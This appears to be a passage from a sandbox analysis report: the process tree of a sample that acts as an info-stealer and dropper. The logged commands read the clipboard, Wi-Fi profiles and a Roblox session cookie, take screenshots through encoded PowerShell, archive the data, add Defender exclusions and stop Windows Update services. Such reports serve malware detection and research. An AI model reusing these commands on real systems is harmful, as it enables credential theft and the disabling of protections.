                                                                                                            PID:2756
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FO LIST
                                                                                                              8⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4188
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3168
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FO LIST
                                                                                                              8⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2700
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2420
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                              8⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4664
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                            7⤵
                                                                                                            • Clipboard Data
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1384
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Get-Clipboard
                                                                                                              8⤵
                                                                                                              • Clipboard Data
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2712
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2760
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FO LIST
                                                                                                              8⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5056
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3020
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              8⤵
                                                                                                                PID:1168
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                              7⤵
                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1204
                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                netsh wlan show profile
                                                                                                                8⤵
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                PID:1512
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                              7⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3752
                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                systeminfo
                                                                                                                8⤵
                                                                                                                • Gathers system information
                                                                                                                PID:884
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                              7⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2356
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                8⤵
                                                                                                                  PID:1044
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                7⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1172
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                  8⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1540
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rdqgm2d0\rdqgm2d0.cmdline"
                                                                                                                    9⤵
                                                                                                                      PID:1168
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC728.tmp" "c:\Users\Admin\AppData\Local\Temp\rdqgm2d0\CSC2FBC111E8EB24207ACCB66E762CFF.TMP"
                                                                                                                        10⤵
                                                                                                                          PID:1564
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    7⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:2452
                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                      tree /A /F
                                                                                                                      8⤵
                                                                                                                        PID:1644
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3860
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                        8⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5028
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                      7⤵
                                                                                                                        PID:4368
                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                          tree /A /F
                                                                                                                          8⤵
                                                                                                                            PID:1140
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                          7⤵
                                                                                                                            PID:2332
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                              8⤵
                                                                                                                              • Drops file in Drivers directory
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:1740
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                            7⤵
                                                                                                                              PID:2924
                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                tree /A /F
                                                                                                                                8⤵
                                                                                                                                  PID:1104
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                7⤵
                                                                                                                                  PID:4048
                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                    tasklist /FO LIST
                                                                                                                                    8⤵
                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1044
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                  7⤵
                                                                                                                                    PID:2396
                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                      tree /A /F
                                                                                                                                      8⤵
                                                                                                                                        PID:3604
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      7⤵
                                                                                                                                        PID:512
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          8⤵
                                                                                                                                            PID:2116
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                          7⤵
                                                                                                                                            PID:4792
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                              8⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:840
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                            7⤵
                                                                                                                                              PID:1040
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                8⤵
                                                                                                                                                  PID:5028
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                  8⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4476
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26362\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\L6sFx.zip" *"
                                                                                                                                                7⤵
                                                                                                                                                  PID:3724
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI26362\rar.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI26362\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\L6sFx.zip" *
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3804
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:3680
                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                      wmic os get Caption
                                                                                                                                                      8⤵
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4396
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:1672
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic computersystem get totalphysicalmemory
                                                                                                                                                        8⤵
                                                                                                                                                          PID:3208
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:2372
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic csproduct get uuid
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4588
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:2500
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                8⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:3444
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:5056
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                  PID:3840
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:4948
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:4892
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\upinstall.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2316
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\updater.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:552
                                                                                                                                                                • C:\Users\Admin\AppData\updater.exe
                                                                                                                                                                  C:\Users\Admin\AppData\updater.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:1464
                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:2484
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:1100
                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:628
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:4568
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:4948
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:1504
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3668
